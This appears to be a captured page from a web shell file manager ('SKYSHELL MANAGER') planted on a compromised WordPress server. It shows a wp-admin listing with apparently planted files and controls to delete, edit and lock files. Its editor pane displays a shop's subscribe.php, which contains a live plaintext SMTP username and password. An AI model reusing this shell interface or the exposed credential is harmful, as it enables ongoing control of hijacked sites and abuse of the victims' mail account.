📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <html lang="en"> <head> <title>EstoreNexus Shop - Subscribe</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Best treatment For different skin types"> <meta name="keywords" content="Skin shop,Best Skin shop"> <link rel="shortcut icon" href="images/favv.png" type="image/x-icon"> <!-- <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />--> <link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/camera.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/style.css" type="text/css" media="screen"> <link href='http://fonts.googleapis.com/css?family=Parisienne|Raleway:400,300' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700' rel='stylesheet' type='text/css'> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/superfish.js"></script> <script type="text/javascript" src="js/jquery.easing.1.3.js"></script> <script type="text/javascript" src="js/camera.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> <script type="text/javascript" src="js/jcarousel.js"></script> <script> jQuery(document).ready(function(){ // Responsive layout, resizing the items $('.carousel.main ul').carouFredSel({ auto: 4000, responsive: true, width: '100%', scroll: 1, prev: '#prev', next: '#next', pagination: false, mousewheel: false, swipe: { onMouse: true, onTouch: true }, items: { width:380, height: 'auto', // optionally resize item-height visible: { min: 2, max: 3 } } }); }); </script> <script type="text/javascript"> $(document).ready(function() { $("#ajax-contact-form").submit(function() { var str = $(this).serialize(); $.ajax( { type: "POST", url: "contact.php", data: str, success: function(msg) { if(msg == 'OK') // Message Sent? Show the 'Thank You' message and hide the form { result = '<div class="notification_ok">Your message has been sent. Thank you!<br> <a href="#" onclick="freset();return false;">send another mail</a></div>'; $("#fields").hide(); } else { result = msg; } $("#note").html(result); } }); return false; }); }); function freset() { $("#note").html(''); document.getElementById('ajax-contact-form').reset(); $("#fields").show(); } </script> <!--[if lt IE 8]> <div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/images/upgrade.jpg"border="0"alt=""/></a></div> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <script type="text/javascript" src="js/jquery.mobile.customized.min.js"></script> <!--<![endif]--> <!--[if lt IE 9]> <link href='http://fonts.googleapis.com/css?family=Open+Sans:400' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:600' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"> <![endif]--> </head> <body> <div id="main"> <!-- <div class="container top"> <div class="row"> <div class="span12"> <div class="clearfix"> <div class="social"> <a href="#"><img src="images/social_1.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_2.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_3.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_4.png" alt="" width="29" height="30" border="0" /></a> <a href="#"><img src="images/social_5.png" alt="" width="29" height="30" border="0" /></a> </div> <!--==============================Search========================= <form id="search-form" action="search.php" method="GET" accept-charset="utf-8" class="navbar-form" > <input type="text" name="s" value='Search' onBlur="if(this.value=='') this.value='Search'" onFocus="if(this.value =='Search' ) this.value=''" > <a href="#" onClick="document.getElementById('search-form').submit()"></a> </form> </div> </div> </div> </div>--> <div id="inner"> <!--==============================Header=================================--> <header> <div class="container"> <div class="row"> <div class="span5"> <div class="clearfix"> <div class="clearfix header-block-pad"> <a href="index.php"><img src="images/estore.png" alt=""></a> </div> </div> </div> <div class="span7"> <p class="phone"> Have questions? <span>Call: +414-289-9997</span> </p> </div> </div> </div> <!--==============================Nav=================================--> <div id="nav_section"> <div class="container"> <div class="row"> <div class="span12"> <div class="navbar navbar_ clearfix"> <div class="navbar-inner navbar-inner_"> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse_">MENU</a> <div class="nav-collapse nav-collapse_ collapse"> <ul class="nav sf-menu"> <li class="active"> <a href="index.php"> Home </a> </li> <li class="sub-menu"> <a href="about-us.php"> About us </a> </li> <li> <a href="services.php"> Services </a> </li> <li > <a href="therapies.php"> Therapies </a> </li> <li> <a href="treatments.php"> Treatments </a> </li> <li > <a href="contact_us.php"> Contact Us </a> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> <!--==============================End Nav=================================--> </header> <!--==============================Carusel=================================--> <div class="carousel-box"> <div class="inner span12"> <div class="carousel main" > <ul > <li > <a> <small>1</small> <h4>Skin Care</h4> <p> Healthy skin starts with a commitment to a regular skin care regimen, using high quality skin care and facial products every day. While we often think of the face first when it comes to caring for the skin, the skin on the body also needs attention. </p> </a> </li> <li > <a> <small>2</small> <h4>Make Up</h4> <p> Away from your everyday makeup favorites like foundations, lip color, blushes and eye shadows, our collection of cosmetics also includes eyelash and eyebrow enhancers, mineral concealers </p> </a> </li> <li > <a> <small>3</small> <h4>Hair Care</h4> <p> Even though we're best known for our skin care, we carry a variety of hair products including shampoos, conditioners, styling products, styling tools and special treatments. </p> </a> </li> <li > <a> <small>4</small> <h4>Bath & Body</h4> <p> Let our range of body products inspire you to pamper yourself from top to toe, whilst looking after your body. With our extensive range of skin loving products, from moisturizers and bath oil </p> </a> </li> </ul> <a id="prev" href="javascript:;" style="display: block;" class=""></a> <a id="next" href="javascript:;" style="display: block;" class=""></a> </div> </div> </div> <!--==============================Content=================================--> <section id="content" > <div class="container"> <div class="row "> <div class="clearfix "> <div class="span6"> <h2>Subscribe</h2> <div class="map"> <img src="images/subscribe.png" title="subscribe" alt=""style="width: 50%; text-align: center; margin-left: 23%; margin-top: 10%;"> </div> <div class="clearfix padcontent"></div> </div> <div class="span6" style="margin-top:10%"> <div id="note"></div> <div id="fields" class="contact-form" style="line-height:30px;margin-top:10px;"> <form action="subscribe.php" class="form-horizontal" method="POST" enctype="multipart/form-data"> <div class="control-group"> <label class="control-label" for="inputName">Full Name:</label> <input type="text" name="name"> </div> <div class="control-group"> <label class="control-label" for="inputEmail">Email:</label> <input type="email" name="email" > </div> <div class="clearfix"></div> <div class="control-group"> <button type="submit" name="Submit" class="btn_ left submit"><i class="icon-envelope icon-white"></i> subscribe</button> </div> </form> <?php //subscribe form if (isset($_POST['Submit'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/estorenexusshop/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@estorenexusshop.com'; $mail->Password = '8xnT8CvTXvdjzWnk'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@estorenexusshop.com', 'EstoreNexus Shop'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@estorenexusshop.com", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "EstoreNexus Shop [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the EstoreNexus Shop newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://estorenexusshop.com/)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@estorenexusshop.com'; $mail2->Password = '8xnT8CvTXvdjzWnk'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@estorenexusshop.com', 'EstoreNexus Shop'); $mail2->addAddress('contact@estorenexusshop.com', 'EstoreNexus Shop'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> <div class="padcontent"></div> </div> </div> </div> </div> </section> <!--============================== end of Content=================================--> <!-- {% Footer %} --> <div class="bg_center_footer"> <div class="container"> <div class="row"> <div class="span3 footer-logo"> </div> <div class="span9"> <ul> <li> <a href="privacy-policy.php"> Privacy Policy </a> </li> <li> <a href="termsandconditions.php"> Terms and Conditions </a> </li> <li> <a href="subscribe.php"> Subscribe </a> </li> <li> <a href="unsubscribe.php"> Unsubscribe </a> </li> </ul> </div> </div> </div> </div> <!-- {% Copyright %} --> <div class="copyright"> <div class="container"> <div class="row"> <div class="span12" style="text-align:center"> <a href="estorenexusshop.com">EstoreNexus Shop</a> © 2024. All rights reserved. </div> </div> </div> </div> </div><!-- inner --> </div><!-- main --> <script type="text/javascript" src="js/bootstrap.js"></script> </body> </html>
Save